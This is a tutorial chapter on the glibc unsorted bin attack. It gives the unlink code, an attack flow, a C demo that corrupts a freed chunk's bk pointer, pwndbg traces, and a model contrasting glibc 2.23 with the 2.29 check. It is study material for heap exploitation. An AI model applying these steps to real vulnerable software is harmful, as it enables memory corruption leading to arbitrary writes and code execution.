Binary Security, Heap Overflow Series: unsorted bin attack
This article is the tenth chapter of the Binary Security: Heap Overflow series; it mainly introduces the unsorted bin attack.
Principle
What it achieves
It can only write one large value to an arbitrary address. Usually a 0x7f is written to an address, which is then combined with a fastbin attack to obtain an arbitrary write.
Unlink operation
```c
/* remove from unsorted list */
bck = victim->bk;
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);   // the fd now holds the address of main_arena
```
After an unsorted bin attack the unsorted bin list can no longer be traversed, because main_arena's bk has been changed by us to target_addr, and the address that av->bk resolves to generally cannot pass the checks. Therefore a fastbin-sized chunk has to be malloc'd in advance and freed before the unsorted bin attack; after the unsorted bin attack, a fastbin-sized chunk is malloc'd again. This yields a chunk whose fd is the main_arena address.
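To make the unlink above concrete, here is an added example (not code from the original post) that models the unsorted-bin removal in C on a constructed arena and chunk: the glibc 2.23 version trusts victim->bk blindly, while the check glibc added in 2.29 ("malloc(): unsorted double linked list corrupted") refuses the corrupted link. The struct and function names are the example's own, not glibc's.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed model of the glibc chunk header: only the fields the unlink touches. */
typedef struct chunk { size_t prev_size, size; struct chunk *fd, *bk; } chunk_t;
/* `unsorted` stands for the fake chunk at main_arena+88 that unsorted_chunks(av) returns. */
typedef struct arena { chunk_t unsorted; } arena_t;
/* Stand-in for the writable memory at the target address (0x601100 in the demo). */
typedef union { chunk_t c; uint64_t w[4]; } target_t;

/* glibc 2.23 removal, as quoted above: victim->bk is trusted blindly, so a corrupted bk
 * turns `bck->fd = ...` into a write of the bin-head address at target+0x10. */
static void unsorted_remove_2_23(arena_t *av, chunk_t *victim) {
    chunk_t *bck = victim->bk;
    av->unsorted.bk = bck;
    bck->fd = &av->unsorted;
}

/* glibc 2.29 and later: both links must be consistent before the unlink, otherwise malloc
 * aborts with "malloc(): unsorted double linked list corrupted" (modelled as return -1). */
static int unsorted_remove_2_29(arena_t *av, chunk_t *victim) {
    chunk_t *bck = victim->bk;
    if (bck->fd != victim || victim->fd != &av->unsorted) return -1;
    av->unsorted.bk = bck;
    bck->fd = &av->unsorted;
    return 0;
}

/* Shared scenario: one freed chunk in the unsorted bin whose bk has been overwritten with
 * the target address, as the demo does with *(long *)(p+8) = 0x601100. */
static void setup(arena_t *av, chunk_t *victim, target_t *target) {
    av->unsorted.fd = av->unsorted.bk = victim;  /* bin holds exactly one chunk */
    victim->fd = &av->unsorted;                  /* fd still points at main_arena+88 */
    victim->bk = &target->c;                     /* corrupted: should be main_arena+88 */
}

/* Returns 1 if the 2.23 unlink wrote the bin-head address into target+0x10 (cf. 0x601110). */
static int attack_writes_target_2_23(void) {
    arena_t av; chunk_t victim; target_t target = {{0}};
    setup(&av, &victim, &target);
    unsorted_remove_2_23(&av, &victim);
    return target.w[2] == (uint64_t)(uintptr_t)&av.unsorted;
}

/* Returns 1 if the 2.29 check refuses the unlink and leaves the target untouched. */
static int attack_rejected_2_29(void) {
    arena_t av; chunk_t victim; target_t target = {{0}};
    setup(&av, &victim, &target);
    int rc = unsorted_remove_2_29(&av, &victim);
    return rc == -1 && target.w[2] == 0;
}
```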
unsorted bin attack flow
```
malloc fastbin 0x70
free fastbin 0x70
change 0x70.fd -> target.addr
malloc 0x100
free 0x100
change 0x100.addr + 0x8 ---> target
malloc 0x100  ---> now *(target - 0x3) = 0x7f
malloc 0x70   ---> change fastbin main_arena->fd
malloc 0x70   ---> get target chunk
```
Demo
```c
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include <string.h>

int main() {
    int size = 0x100;             // above fastbin range, so free() puts p into the unsorted bin
    char *p = malloc(size);
    printf("%p\n", p);
    sleep(0);                     // convenient breakpoint
    free(p);                      // p now sits alone in the unsorted bin
    sleep(0);
    *(long *)(p + 8) = 0x601100;  // overwrite p's bk with the target address
    sleep(0);
    char *r = malloc(size);       // unlinking p writes main_arena+88 to target + 0x10
    printf("%p\n", r);
    sleep(0);
    return 0;
}
// This demo obtains a large value, 0x7f, stored at the target chunk.
// That chunk can be taken out and used with a fastbin attack.
```
Debugging
Bins list and heap after free p
```
unsortedbin
all: 0x602000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602000
pwndbg> x/20gz 0x602000
0x602000:  0x0000000000000000  0x0000000000000111
0x602010:  0x00007ffff7dd1b78  0x00007ffff7dd1b78   --> fd and bk both point to main_arena
pwndbg> x/20gz 0x00007ffff7dd1b78
0x7ffff7dd1b78 <main_arena+88>:   0x0000000000602520  0x0000000000000000   --> top chunk addr
0x7ffff7dd1b88 <main_arena+104>:  0x0000000000602000  0x0000000000602000   --> p addr
```
Bins list and heap after modifying bk
```
unsortedbin
all [corrupted]
FD: 0x602000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602000
BK: 0x602000 —▸ 0x601100 ◂— 0x0
pwndbg> x/20gz 0x602000
0x602000:  0x0000000000000000  0x0000000000000111
0x602010:  0x00007ffff7dd1b78  0x0000000000601100   --> bk has been changed to target.addr
```
Bins and heap after malloc r
```
unsortedbin
all [corrupted]
FD: 0x602000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602000
BK: 0x601100 ◂— 0x0
```
0x602000 has now been handed out by malloc, and 0x601100 points to main_arena.
```
pwndbg> x/20gz 0x601100
0x601100:  0x0000000000000000  0x0000000000000000
0x601110:  0x00007ffff7dd1b78  0x0000000000000000   --> main_arena
pwndbg> x/20gz 0x601100-0x3
0x6010fd:  0x0000000000000000  0x0000000000000000
0x60110d:  0xfff7dd1b78000000  0x000000000000007f   ==> a 0x7f has been constructed
```
